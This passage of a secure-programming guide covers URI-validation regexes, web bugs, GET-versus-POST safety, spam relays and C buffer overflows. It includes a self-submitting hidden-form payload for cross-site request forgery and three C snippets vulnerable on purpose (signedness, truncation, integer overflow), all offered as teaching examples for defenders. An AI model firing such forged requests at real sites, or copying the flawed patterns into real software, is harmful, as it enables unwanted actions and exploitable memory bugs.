  is removed before use or ignored during use. -->

<programlisting width="79">
 (
 (
  # Handle http, https, and relative URIs:
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
   (\?(                                                              # query:
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
        ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
        (\&amp;([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
         ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
       |
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+  # isindex
       )
   ))?
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )|
 # Handle ftp:
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )
 )
</programlisting>

</para>

<para>
Even the sophisticated pattern shown above doesn't forbid all illegal URIs.
For example, again, "20.20" isn't a legal domain name, but it's allowed
by the pattern; however, to my knowledge
this shouldn't cause any security problems.
The sophisticated pattern forbids URL escapes that represent
control characters (e.g., %00 through $1F) -
the smallest permitted escape value is %20 (ASCII space).
Forbidding control characters prevents some trouble, but it's
also limiting; change "2-9" to "0-9" everywhere if you need to support sending
all control characters to arbitrary web applications.
This pattern does permit all other URL escape values in paths,
which is useful for international characters but could cause trouble
for a few systems which can't handle it.
The pattern at least prevents spaces, linefeeds,
double-quotes, and other dangerous characters
from being in the URI, which prevents other kinds of
attacks when incorporating the URI into a generated document.
Note that the pattern permits ``+'' in many places, since in practice
the plus is often used to replace the space character
in queries and fragments.
</para>

<para>
Unfortunately, as noted above,
there are attacks which can work through any technique that permit query data,
and there don't seem to be really good defenses for them once you
permit queries.
So, you could strip out the ability to use query data from the
pattern above, but permit the other forms, producing a
``sophisticated mostly safe'' pattern:
<programlisting width="79">
 (
 (
  # Handle http, https, and relative URIs:
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )|
 # Handle ftp:
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )
 )
</programlisting>
</para>

<para>
As far as I can tell, as long as these patterns are only used to check
hypertext anchors selected by the user (the "&lt;a&gt;" tag)
this approach also prevents the insertion of ``web bugs''.
Web bugs are simply text that allow someone other
than the originating web server
of the main page to track information such as who read
the content and when they read it -
see <xref linkend="embedded-content-bugs"> for more information.
This isn't true if you use the &lt;img&gt; (image) tag with the same
checking rules - the image tag is loaded immediately, permitting
someone to add a ``web bug''.
Once again, this presumes that you're not permitting any attributes;
many attributes can be quite dangerous and pierce the security you're
trying to provide.
</para>

<para>
Please note that all of these patterns require the entire URI match
the pattern.
An unfortunate fact of these patterns is that they limit the
allowable patterns in a way that forbids many useful ones
(e.g., they prevent the use of new URI schemes).
Also, none of them can prevent the very real problem that some web sites
perform more than queries when presented with a query - and some of these
web sites are internal to an organization.
As a result, no URI can really be safe until there
are no web sites that accept GET queries as an action
(see <xref linkend="avoid-get-non-queries">).
For more information about legal URLs/URIs, see IETF RFC 2396;
domain name syntax is further discussed in IETF RFC 1034.
</para>
</sect2>

<sect2 id="other-html-tags">
<title>Other HTML tags</title>

<para>
You might even consider supporting more HTML tags.
Obvious next choices are the list-oriented tags, such as
&lt;ol&gt; (ordered list),
&lt;ul&gt; (unordered list),
and &lt;li&gt; (list item).
However, after a certain point you're really permitting
full publishing (in which case you need to trust the provider or perform more
serious checking than will be described here).
Even more importantly, every new functionality you add creates an
opportunity for error (and exploit).
</para>

<para>
One example would be permitting the
&lt;img&gt; (image) tag with the same URI pattern.
It turns out this is substantially less safe, because this
permits third parties to insert ``web bugs'' into the document,
identifying who read the document and when.
See <xref linkend="embedded-content-bugs"> for more information on web bugs.
</para>
</sect2>

<sect2 id="related-issues">
<title>Related Issues</title>

<para>
Web applications should also explicitly specify the character set
(usually ISO-8859-1), and not permit other characters, if data from
untrusted users is being used.
See <xref linkend="output-character-encoding"> for more information.
</para>

<para>
Since filtering this kind of input is easy to get wrong, other
alternatives have been discussed as well.
One option is to ask users to use a different language, much simpler
than HTML, that you've designed - and you give that language very limited
functionality.
Another approach is parsing the HTML into some internal ``safe'' format,
and then translating that safe format back to HTML.
</para>

<para>
Filtering can be done during input, output, or both.
The CERT recommends filtering data during the output process,
just before it is rendered as part of the dynamic page.
This is because, if it is done correctly,
this approach ensures that all dynamic content is filtered.
The CERT believes that filtering on the input side is less effective
because dynamic content can be entered into a web sites database(s) via
methods other than HTTP, and in this case,
the web server may never see the data as part of the input process.
Unless the filtering is implemented in all places where dynamic data
is entered, the data elements may still be remain tainted.
</para>

<para>
However, I don't agree with CERT on this point for all cases.
The problem is that it's just as easy to forget to filter all the output
as the input, and allowing ``tainted'' input into your system
is a disaster waiting to happen anyway.
A secure program has to filter its inputs anyway, so it's sometimes better
to include all of these checks as part of the input filtering
(so that maintainers can see what the rules really are).
And finally, in some secure programs there are many different program
locations that may output a value, but only a very few ways and locations
where a data can be input into it;
in such cases filtering on input may be a better idea.
</para>
</sect2>

</sect1>

<sect1 id="avoid-get-non-queries">
<title>Forbid HTTP GET To Perform Non-Queries</title>
<para>
Web-based applications using HTTP should prevent the use of
the HTTP ``GET'' or ``HEAD'' method for anything other than queries.
HTTP includes a number of different methods; the two most popular methods
used are GET and POST.
Both GET and POST can be used to transmit data from a form, but the
GET method transmits data in the URL, while the POST method
transmits data separately.
</para>

<para>
The security problem of using GET to perform non-queries
(such as changing data, transferring money, or signing up for a service)
is that an attacker can create a hypertext link
with a URL that includes malicious form data.
If the attacker convinces a victim to click on the link
(in the case of a hypertext link),
or even just view a page (in the case of transcluded information
such as images from HTML's img tag), the victim
will perform a GET.
When the GET is performed,
all of the form data created by the attacker will be sent by the victim
to the link specified.
This is a cross-site malicious content attack, as discussed further in
<xref linkend="cross-site-malicious-content">.
</para>

<para>
If the only action that a malicious cross-site content attack can perform is
to make the user view unexpected data, this isn't as serious a problem.
This can still be a problem, of course, since there are some attacks
that can be made using this capability.
For example, there's a
potential loss of privacy due to the user requesting something unexpected,
possible real-world effects from appearing to request illegal or
incriminating material, or by making the user request the information
in certain ways the information may be exposed to an attacker
in ways it normally wouldn't be exposed.
However, even more serious effects can be caused if the malicious attacker
can cause not just data viewing, but changes in data, through
a cross-site link.
</para>

<para>
Typical HTTP interfaces (such as most CGI libraries) normally hide the
differences between GET and POST, since for getting data it's useful
to treat the methods ``the same way.''
However, for actions that actually cause something other than a data query,
check to see if the request is something other than POST;
if it is, simply display a filled-in form with the data given and ask
the user to confirm that they really mean the request.
This will prevent cross-site malicious content attacks, while still
giving users the convenience of confirming the action with
a single click.
</para>

<para>
Indeed, this behavior is strongly recommended by the HTTP specification.
According to the HTTP 1.1 specification (IETF RFC 2616 section 9.1.1),
``the GET and HEAD methods SHOULD NOT have the significance of
taking an action other than retrieval.
These methods ought to be considered "safe".
This allows user agents to represent other methods,
such as POST, PUT and DELETE, in a special way,
so that the user is made aware of the fact that a possibly
unsafe action is being requested.''
</para>

<para>
In the interest of fairness, I should note that this doesn't
completely solve the problem, because on some browsers
(in some configurations) scripted posts can do the same thing.
For example, imagine a web browser with ECMAscript (Javascript) enabled
receiving the following HTML snippet - on some browsers, simply
displaying this HTML snippet will
automatically force the user to send a POST request to a website
chosen by the attacker, with form data defined by the attacker:
<programlisting>
<![CDATA[
  <form action=http://remote/script.cgi method=post name=b>
    <input type=hidden name=action value="do something">
    <input type=submit>
  </form>
  <script>document.b.submit()</script>
]]>
</programlisting>
My thanks to David deVitry pointing this out.
However, although this advice doesn't solve all problems, it's
still worth doing.
In part, this is because the remaining problem
can be solved by smarter web browsers
(e.g., by always confirming the data before
allowing ECMAscript to send a web form) or
by web browser configuration (e.g., disabling ECMAscript).
Also, this attack doesn't work in many cross-site scripting exploits, because
many websites don't allow users to post ``script'' commands but do
allow arbitrary URL links.
Thus, limiting the actions a GET command can perform to queries
significantly improves web application security.
</para>

</sect1>

<sect1 id="counter-spam">
<title>Counter SPAM</title>
<para>
Any program that can send email elsewhere, by request from the network,
can be used to transport spam.
Spam is the usual name for unsolicited bulk email (UBE) or
mass unsolicited email.
It's also sometimes called unsolicited commercial email (UCE), though
that name is misleading - not all spam is commercial.
For a discussion of why spam is such a serious problem and more general
discussion about it,
see my essay at
<ulink url="http://www.dwheeler.com/essays/stopspam.html">http://www.dwheeler.com/essays/stopspam.html</ulink>, as well as
<ulink url="http://mail-abuse.org/">http://mail-abuse.org/</ulink>,
<ulink url="http://spam.abuse.net/">http://spam.abuse.net/</ulink>,
<ulink url="http://http://www.cauce.org/">CAUCE</ulink>, and
<ulink url="http://www.faqs.org/rfcs/rfc2635.html">IETF RFC 2635</ulink>.
Spam receivers and intermediaries bear most of the cost
of spam, while the spammer spends very little to send it.
Therefore many people regard spam as a theft of service, not just some
harmless activity, and that number increases as the amount of
spam increases.
</para>
<para>
If your program can be used to generate email sent to others
(such as a mail transfer agent, generator of data sent by email, or
a mailing list manager),
be sure to write your program to prevent its unauthorized use as a
mail relay.
A program should usually only allow legitimate authorized users
to send email to others (e.g., those inside that company's mail server
or those legitimately subscribed to the service).
More information about this is in
<ulink url="http://www.faqs.org/rfcs/rfc2505.html">IETF RFC 2505</ulink>
Also, if you manage a mailing list, make sure that it can enforce the
rule that only subscribers can post to the list, and create a ``log in''
feature that will make it somewhat harder for spammers to subscribe, spam, and
unsubscribe easily.
</para>
<para>
One way to more directly counter SPAM is to incorporate support for the
MAPS (Mail Abuse Prevention System LLC) RBL (Realtime Blackhole List),
which maintains in real-time
a list of IP addresses where SPAM is known to originate.
For more information, see
<ulink url="http://mail-abuse.org/rbl/">http://mail-abuse.org/rbl/</ulink>.
Many current Mail Transfer Agents (MTAs) already support the RBL;
see their websites for how to configure them.
The usual way to use the RBL is to simply refuse to accept any requests
from IP addresses in the blackhole list;
this is harsh, but it solves the problem.
Another similar service is the Open Relay Database (ORDB) at
<ulink url="http://ordb.org">http://ordb.org</ulink>, which identifies
dynamically those sites that permit open email relays
(open email relays are misconfigured email servers that allow spammers to
send email through them).
Another location for more information is
<ulink url="http://www.spews.org">SPEWS</ulink>.
I believe there are other similar services as well.
</para>
<para>
I suggest that many systems and programs,
by default, enable spam blocking if they
can send email on to others whose identity is under control
of a remote user - and that includes MTAs.
At the least, consider this.
There are real problems with this suggestion, of course -
you might (rarely) inhibit communication with a legitimate user.
On the other hand, if you don't block spam, then it's likely that everyone
<emphasis>else</emphasis> will blackhole your system
(and thus ignore your emails).
It's not a simple issue, because no matter what you do, some people
will not allow you to send them email.
And of course, how well do you trust the organization keeping up the
real-time blackhole list - will they add truly innocent sites to the
blackhole list, and will they remove sites from the blackhole list
once all is okay?
Thus, it becomes a trade-off - is it more important to talk to spammers
(and a few innocents as well), or is it more important to talk to
those many other systems with spam blocks
(losing those innocents who share equipment with spammers)?
Obviously, this must be configurable.
This is somewhat controversial advice, so consider your options for
your circumstance.
</para>
</sect1>

<sect1 id="limit-time">
<title>Limit Valid Input Time and Load Level</title>

<para>
Place time-outs and load level limits, especially on incoming network data.
Otherwise, an attacker might be able to easily cause a denial of service
by constantly requesting the service.
</para>

</sect1>

</chapter>

<chapter id="buffer-overflow">
<title>Avoid Buffer Overflow</title>

<epigraph>
<attribution>Amos 3:11 (NIV)</attribution>
<para>
An enemy will overrun the land;
he will pull down your strongholds and
plunder your fortresses.
</para>
</epigraph>

<para>
An extremely common security flaw is vulnerability to a ``buffer overflow''.
Buffer overflows are also called ``buffer overruns'', and there are
many kinds of buffer overflow attacks (including
``stack smashing'' and ``heap smashing'' attacks).
Technically, a buffer overflow is a problem with the program's internal
implementation, but it's such a common and serious problem that
I've placed this information in its own chapter.
To give you an idea of how important this subject is,
at the CERT, 9 of 13 advisories in 1998 and at least half of
the 1999 advisories involved buffer overflows.
An informal 1999 survey on Bugtraq found that approximately 2/3 of the
respondents felt that buffer overflows were the leading cause of
system security vulnerability (the remaining respondents identified
``mis-configuration'' as the leading cause) [Cowan 1999].
This is an old, well-known problem, yet it continues to resurface
[McGraw 2000].
<!-- ???: Get the stats from the libsafe paper -->
</para>

<para>
A buffer overflow occurs when you write a set of values
(usually a string of characters) into a fixed length buffer
and write at least one value outside that buffer's boundaries
(usually past its end).
A buffer overflow can occur when reading input from the user into a buffer,
but it can also occur during other kinds of processing in a program.
</para>

<para>
If a secure program permits a buffer overflow, the overflow can often be
exploited by an adversary.
If the buffer is a local C variable, the overflow can be used to
force the function to run code of an attackers' choosing.
This specific variation is often called a ``stack smashing'' attack.
A buffer in the heap isn't much better; attackers may be able to
use such overflows to control other variables in the program.
More details can be found from Aleph1 [1996], Mudge [1995], LSD [2001],
or the Nathan P. Smith's
"Stack Smashing Security Vulnerabilities" website at
<ulink
url="http://destroy.net/machines/security/">http://destroy.net/machines/security/</ulink>.
A discussion of the problem and some ways to counter them is given
by Crispin Cowan et al, 2000, at
<ulink url="http://immunix.org/StackGuard/discex00.pdf">
http://immunix.org/StackGuard/discex00.pdf</ulink>.
<!--
Buffer Overflows:
Attacks and Defenses for the Vulnerability of the Decade.
Crispin Cowan, Perry Wagle, Calton Pu,
Steve Beattie, and Jonathan Walpole
Department of Computer Science and Engineering
Oregon Graduate Institute of Science & Technology

It appeared at the DARPA DISCEX conference
http://schafercorp-ballston.com/discex, and again as an invited talk
at the SANS 2000 conference http://www.sans.org/sans2000/sans2000.htm

-->
A discussion of the problem and some ways to counter them in Linux
is given by
Pierre-Alain Fayolle and Vincent Glaume
at
<ulink url="http://www.enseirb.fr/~glaume/indexen.html">
http://www.enseirb.fr/~glaume/indexen.html</ulink>.
<!-- A Buffer Overflow Study
Attacks & Defenses
-->
<!--

On Bugtraq:
Subject: Re: A buffer overflow study - generic protections
From: Crispin Cowan <crispin@wirex.com>
Date: Tue, 02 Apr 2002 14:02:15 -0800
To: bugtraq@securityfocus.com

The similarities [of these two papers]
are substantial: we also categorized the attack space
(kinds of buffer overflows), surveyed the defenses, and considered
optimal combinations of defenses to get good coverage at reasonable
cost. Differences:

    * Our survey was much broader. We covered:
          * Non-executable buffers (i.e. Solar Designer's non-executable
            stack patch, and a similar feature in Solaris)
          * Array bunds checking (Compaq's ccc compiler, and the bounds
            checking GCC built by Jones & Kelly and maintained by Herman
            ten Brugge, Purify, and type safe languages such as Java)
          * Code pointer integrity checking (StackGuard, and the
            hand-coded stack introspection that Snarskii built into
            FreeBSD's libc)
    * We did not cover:
          * libsafe: it did not exist at the time
          * grsecurity: it is just a derivative of Solar Designer's work
          * PAX: it did not exist at the time
          * Prelude: I don't understand how a general purpose host
            intrusion detection system bears on a survey of buffer overflows
          * Stack Shield: it is just a weak immitation of StackGuard,
            with no advantages, and substantial disadvantages
    * We came to a somewhat similar conclusion: that a combination of
      tools was the ideal defense. However, our preferred combo was
      StackGuard + Solar Designer's non-executable stack patch, which is
      what we actually ship in Immunix.
          * StackGuard offers the best resistance to "stack smashing"
            attacks
          * Non-executable stack segments offer substantial resistance
            to code injection (payload)
          * The two techniques are transparently compatible, and the
            combined performance overhead is nearly zero
    * As above, we did not consider PAX, but we would still not recomend
      it for most applications: the 10% macrobenchmark performance hit
      is pretty high.
    * We are mystified why Vincent et al recomend Stack Shield instead
      of StackGuard: Stack Shield offers no advantages (it is not more
      secure and it is not faster) and is much more problematic to deploy.
    * Libsafe vs. StackGuard or Stack Shield is a true decision: Libsafe
      is incompatible with compiler techniques that munge the call stack
      (and incompatible with -fno-frame-pointer) so you have to choose
      one or the other
-->
</para>

<para>
Most high-level programming languages are essentially
immune to this problem, either
because they automatically resize arrays (e.g., Perl), or because they normally
detect and prevent buffer overflows (e.g., Ada95).
However, the C language provides no protection against
such problems, and C++ can be easily used in ways to cause this problem too.
Assembly language also provides no protection, and some languages
that normally include such protection (e.g., Ada and Pascal) can have
this protection disabled (for performance reasons).
Even if most of your program is written in another language,
many library routines are written in C or C++, as well as ``glue'' code to
call them, so other languages often don't provide as complete a protection
from buffer overflows as you'd like.
</para>

<sect1 id="dangers-c">
<title>Dangers in C/C++</title>

<para>
C users must avoid using dangerous functions that do not check bounds
unless they've ensured that the bounds will never get exceeded.
Functions to avoid in most cases (or ensure protection) include
the functions strcpy(3), strcat(3), sprintf(3)
(with cousin vsprintf(3)), and gets(3).
These should be replaced with functions such as strncpy(3), strncat(3),
snprintf(3), and fgets(3) respectively, but see the discussion below.
The function strlen(3) should be avoided unless you can ensure that there
will be a terminating NIL character to find.
The scanf() family (scanf(3), fscanf(3),  sscanf(3),  vscanf(3),
vsscanf(3), and vfscanf(3)) is often dangerous to use; do not use it
to send data to a string without controlling the maximum length
(the format %s is a particularly common problem).
Other dangerous functions that may permit buffer overruns (depending on their
use) include
realpath(3), getopt(3), getpass(3),
streadd(3), strecpy(3), and strtrns(3).
You must be careful with getwd(3); the buffer sent to getwd(3) must be
at least PATH_MAX bytes long.
The select(2) helper macros
FD_SET(), FD_CLR(), and FD_ISSET() do not check that the index fd
is within bounds; make sure that fd &gt;= 0 and fd &lt;= FD_SETSIZE
(this particular one has been exploited in pppd).
</para>

<para>
Unfortunately, snprintf()'s variants have additional problems.
Officially, snprintf() is not a standard C function in the ISO 1990
(ANSI 1989) standard, though sprintf() is,
so not all systems include snprintf().
Even worse, some systems' snprintf() do not actually protect
against buffer overflows; they just call sprintf directly.
Old versions of Linux's libc4 depended on a ``libbsd'' that did this
horrible thing, and I'm told that some old HP systems did the same.
Linux's current version of snprintf is known to work correctly, that is, it
does actually respect the boundary requested.
The return value of snprintf() varies as well;
the Single Unix Specification (SUS) version 2
and the C99 standard differ on what is returned by snprintf().
Finally, it appears that at least some versions of
snprintf don't guarantee that its string will end in NIL; if the
string is too long, it won't include NIL at all.
Note that the glib library (the basis of GTK, and not the same as the
GNU C library glibc) has a g_snprintf(), which
has a consistent return semantic, always NIL-terminates, and
most importantly always respects the buffer length.
<!-- libsafe protects:
       [vf]scanf(const char *format, ...)
              May overflow its arguments.
       realpath(char *path, char resolved_path[])
              May overflow the path buffer.
       [v]sprintf(char *str, const char *format, ...)
              May overflow the str buffer.
-->
</para>

<para>
Of course, the problem is more than just calling string functions poorly.
Here are a few additional examples of types of buffer overflow problems,
graciously suggested by Timo Sirainen, involving manipulation of
numbers to cause buffer overflows.
<!-- http://irccrew.org/~cras/security/flaws.html -->
</para>

<para>
First, there's the problem of signedness.
If you read data that affects the buffer size,
such as the "number of characters to be read,"
be sure to check if the number is less than zero or one.
Otherwise, the negative number may be cast to an unsigned number,
and the resulting large positive number
may then permit a buffer overflow problem.
Note that sometimes an attacker can provide a large positive number and
have the same thing happen;
in some cases, the large value will be interpreted as a negative number
(slipping by the check for large numbers if there's no check
for a less-than-one value),
and then be interpreted later into a large positive value.

<programlisting>
<![CDATA[
 /* 1) signedness - DO NOT DO THIS. */
 char *buf;
 int i, len;

 read(fd, &len, sizeof(len));

 /* OOPS!  We forgot to check for < 0 */
 if (len > 8000) { error("too large length"); return; }

 buf = malloc(len);
 read(fd, buf, len); /* len casted to unsigned and overflows */
]]>
</programlisting>
</para>

<para>
Here's a second example identified by Timo Sirainen,
involving integer size truncation.
Sometimes the different sizes of integers
can be exploited to cause a buffer overflow.
Basically, make sure that you don't truncate any integer results used to
compute buffer sizes.
Here's Timo's example for 64-bit architectures:

<!--
, showing two cases of this problem - one
for 32 bit architectures with large file support
(where the offset values are 64 bits), and another for 64-bit architectures.
<programlisting>
 /* For 32bit architectures with large file support: */

 char *buf;
 off_t len;

 read(fd, &len, sizeof(len));

 /* we're relying on malloc() to fail with too large values */
 if (len <= 0) { error("invalid length"); return; }

 /* 64bit off_t gets truncated to 32bit size_t */
 buf = malloc(len);
 read(fd, buf, len);
-->

<programlisting>
<![CDATA[
 /* An example of an ERROR for some 64-bit architectures,
    if "unsigned int" is 32 bits and "size_t" is 64 bits: */

 void *mymalloc(unsigned int size) { return malloc(size); }

 char *buf;
 size_t len;

 read(fd, &len, sizeof(len));

 /* we forgot to check the maximum length */

 /* 64-bit size_t gets truncated to 32-bit unsigned int */
 buf = mymalloc(len);
 read(fd, buf, len);
]]>
</programlisting>
</para>

<para>
Here's a third example from Timo Sirainen, involving integer overflow.
This is particularly nasty when combined with malloc(); an attacker
may be able to create a situation where the computed buffer size
is less than the data to be placed in it.
Here is Timo's sample:
<programlisting>
<![CDATA[
 /* 3) integer overflow */
 char *buf;
 size_t len;

 read(fd, &len, sizeof(len));

 /* we forgot to check the maximum length */

 buf = malloc(len+1); /* +1 can overflow to malloc(0) */
 read(fd, buf, len);
 buf[len] = '\0';
]]>
</programlisting>
</para>
</sect1>

<sect1 id="library-c">
<title>Library Solutions in C/C++</title>

<para>
One partial solution in C/C++ is to use library functions that do not have
buffer overflow problems.
The first subsection describes the ``standard C library'' solution, which
can work but has its disadvantages.
The next subsection describes the general security issues of both
fixed length and dynamically reallocated approaches to buffers.
The following subsections describe various alternative libraries,
such as strlcpy and libmib.
Note that these don't solve all problems; you still have to code
extremely carefully in C/C++ to avoid all buffer overflow situations.
</para>

<sect2 id="buffer-standard-solution">
<title>Standard C Library Solution</title>

<para>
The ``standard'' solution to prevent buffer overflow in C
(which is also used in some C++ programs)
is to use the standard C library calls that defend against these problems.
This approach depends heavily on the standard library functions
strncpy(3) and strncat(3).
If you choose this approach, beware: these calls have somewhat surprising
semantics and are hard to use correctly.
The function strncpy(3) does not NIL-terminate the destination string
if the source string length is at least equal to the destination's, so
be sure to set the last character of the destination string to NIL after
calling strncpy(3).
If you're going to reuse the same buffer many times,
an efficient approach is to tell strncpy() that the buffer is one
character shorter than it actually is and set the last character to
NIL once before use.
Both strncpy(3) and strncat(3) require that you pass
the amount of space left available, a computation
that is easy to get wrong (and getting it wrong could permit a
buffer overflow attack).
Neither provide a simple mechanism to determine if an overflow has occurred.
Finally, strncpy(3) has a significant performance penalty compared
to the strcpy(3) it supposedly replaces,
because <emphasis remap="it">strncpy(3) NIL-fills the remainder of the destination</emphasis>.
I've gotten emails expressing surprise over this last point, but this is
clearly stated in Kernighan and Ritchie second edition
[Kernighan 1988, page 249], and this behavior is clearly documented in
the man pages for Linux, FreeBSD, and Solaris.
This means that just changing from strcpy to strncpy can cause a severe
reduction in performance, for no good reason in most cases.
</para>

<para>
Warning!!
The function strncpy(s1, s2, n) can also be used as
a way of copying only part of s2, where n is less than strlen(s2).
When used this way, strncpy() basically provides no protection against
buffer overflow by itself - you have to take
separate actions to ensure that n is smaller than the buffer of s1.
Also, when used this way, strncpy() does not usually add a trailing NIL
after copying n characters.
This makes it harder to determine if a program using strncpy() is secure.
</para>

<para>
<!-- from Hudin Lucian, BUGTRAQ - 29 Jun 2000 -->
<!-- David A. Wheeler checked it and found that it was WRONG - 18 July 2000 -->
<!-- Sean Winn reaffirmed this 28 Oct 2000.  Wheeler rechecked, and found
     that his code was wrong.  Text here was rewritten as a result. -->
You can also use sprintf() while preventing
buffer overflows, but you need to be careful when doing so;
it's so easy to misapply that it's hard to recommend.
The sprintf control string can contain various conversion specifiers
(e.g., "%s"), and the control specifiers can have optional
field width (e.g., "%10s") and precision (e.g., "%.10s") specifications.
These look quite similar (the only difference is a period)
but they are very different.
The field width only
specifies a <emphasis>minimum</emphasis> length and is
completely worthless for preventing buffer overflows.
In contrast, the precision specification specifies the maximum
length that the particular string may have in its output when
used as a string conversion specifier - and thus it can be used
to protect against buffer overflows.
Note that the precision specification only specifies the total maximum
length when dealing with a string; it has a different meaning for
other conversion operations.
If the size is given as a precision of "*", then you can pass the maximum size
as a parameter (e.g., the result of a sizeof() operation).
This is most easily shown by an example - here's the wrong and right
way to use sprintf() to protect against buffer overflows:
<programlisting width="61">
 char buf[BUFFER_SIZE];
 sprintf(buf, "%*s",  sizeof(buf)-1, "long-string");  /* WRONG */
 sprintf(buf, "%.*s", sizeof(buf)-1, "long-string");  /* RIGHT */
</programlisting>
In theory, sprintf() should be very helpful because you can use it
to specify complex formats.
Sadly, it's easy to get things wrong with sprintf().
If the format is complex, you
need to make sure that the destination is large enough for the largest
possible size of the <emphasis>entire</emphasis>
format, but the precision field only controls
the size of one parameter.
The "largest possible" value is often hard to determine when a
complicated output is being created.
If a program doesn't allocate quite enough space for the longest possible
combination, a buffer overflow vulnerability may open up.
Also, sprintf() appends a NUL to the destination
after the entire operation is complete -
this extra character is easy to forget and creates an opportunity
for off-by-one errors.
So, while this works, it can be painful to use in some circumstances.
</para>
<para>
Also, a quick note about the code above - note that the sizeof()
operation used the size of an array.
If the code were changed so that ``buf'' was a pointer to some
allocated memory, then all ``sizeof()'' operations would have to be
changed (or sizeof would just measure the size of a pointer, which isn't
enough space for most values).
</para>

<para>
The scanf() family is sadly a little murky as well.
An obvious question is whether or not the maximum width value can
be used in %s to prevent these attacks.
There are multiple official specifications for scanf();
some clearly state that the width parameter is the absolutely largest
number of characters, while others aren't as clear.
<!-- IEEE Std 1003.1-2001 is clear that max widths must be implemented,
  http://www.opengroup.org/onlinepubs/007904975/functions/scanf.html;
  the Single Unix Spec is much less clear. -->
The biggest problem is implementations; modern implementations
that I know of do support maximum widths, but I cannot say with
certainty that all libraries properly implement maximum widths.
The safest approach is to do things yourself in such cases.
However, few will fault you if you simply use scanf and include the
widths in the format strings
(but don't forget to count \0, or you'll get the wrong length).
If you do use scanf, it's best to include a test in your installation
scripts to ensure that the library properly limits length.

</para>

</sect2>

<sect2 id="static-vs-dynamic-buffers">
<title>Static and Dynamically Allocated Buffers</title>

<para>
Functions such as strncpy
are useful for dealing with statically allocated buffers.
This is a programming approach where a buffer is allocated for
the ``longest useful size'' and then it stays a fixed size from then on.
The alternative is to dynamically reallocate buffer sizes as you need them.
It turns out that both approaches have security implications.
</para>

<para>
<!-- Thanks to Ryan McCabe (thanks.odin@numb.org) for the comment
     that fixed-length buffers have their own exploitable problems. -->
There is a general security problem when using fixed-length buffers: the fact
that the buffer is a fixed length may be exploitable.
This is a problem with strncpy(3) and strncat(3), snprintf(3),
strlcpy(3), strlcat(3), and other such functions.
The basic idea is that the attacker sets up a really long string so that,
when the string is truncated, the final result will be what the
attacker wanted (instead of what the developer intended).
Perhaps the string is catenated from several smaller
pieces; the attacker might make the first piece as long as the entire
buffer, so all later attempts to concatenate strings do nothing.
Here are some specific examples:

<itemizedlist>
<listitem>

<para>
Imagine code that calls gethostbyname(3) and, if
successful, immediately copies hostent-&#62;h&lowbar;name to a
fixed-size buffer using strncpy or snprintf.
Using strncpy or snprintf protects against an overflow of an excessively
long fully-qualified domain name (FQDN), so you might think you're done.
However, this could result in chopping off the end of the FQDN.
This may be very undesirable, depending on what happens next.
</para>
</listitem>
<listitem>

<para>
Imagine code that uses strncpy, strncat, snprintf, etc., to copy the
full path of a filesystem object to some buffer.
Further imagine that the original value was provided by an
untrusted user, and that the copying is part of a process to pass a
resulting computation to a function.
Sounds safe, right?
Now imagine that an attacker pads a path
with a large number of '/'s at the beginning.  This could
result in future operations being performed on the file ``/''.
If the program appends values in the belief that the result will be safe,
the program may be exploitable.
Or, the attacker could devise a long filename near the buffer length, so that
attempts to append to the filename would silently fail to occur
(or only partially occur in ways that may be exploitable).
</para>
</listitem>

</itemizedlist>

</para>

<para>
When using statically-allocated buffers,
you really need to consider the length of the source and destination arguments.
Sanity checking the input and the resulting intermediate computation might
deal with this, too.
</para>

<para>
Another alternative is to dynamically reallocate all strings instead of using
fixed-size buffers.
This general approach is recommended by the GNU programming guidelines,
since it permits programs to handle arbitrarily-sized inputs
(until they run out of memory).
Of course, the major problem with dynamically allocated strings is that you
may run out of memory.  The memory may even be exhausted at some other
point in the program than the portion where you're worried about buffer
overflows; any memory allocation can fail.
Also, since dynamic reallocation may cause memory to be inefficiently
allocated, it is entirely possible to run out of memory even though
technically there is enough virtual memory available to the program
to continue.
In addition, before running out of memory the program will probably
use a great deal of virtual memory; this can easily result in
``thrashing'', a situation in which the computer spends all its time
just shuttling information between the disk and memory (instead of
doing useful work).
This can have the effect of a denial of service attack.
Some rational limits on input size can help here.
In general, the program must be designed to
fail safely when memory is exhausted if you use dynamically allocated strings.
</para>

</sect2>

<sect2 id="strlcpy">
<title>strlcpy and strlcat</title>

<para>
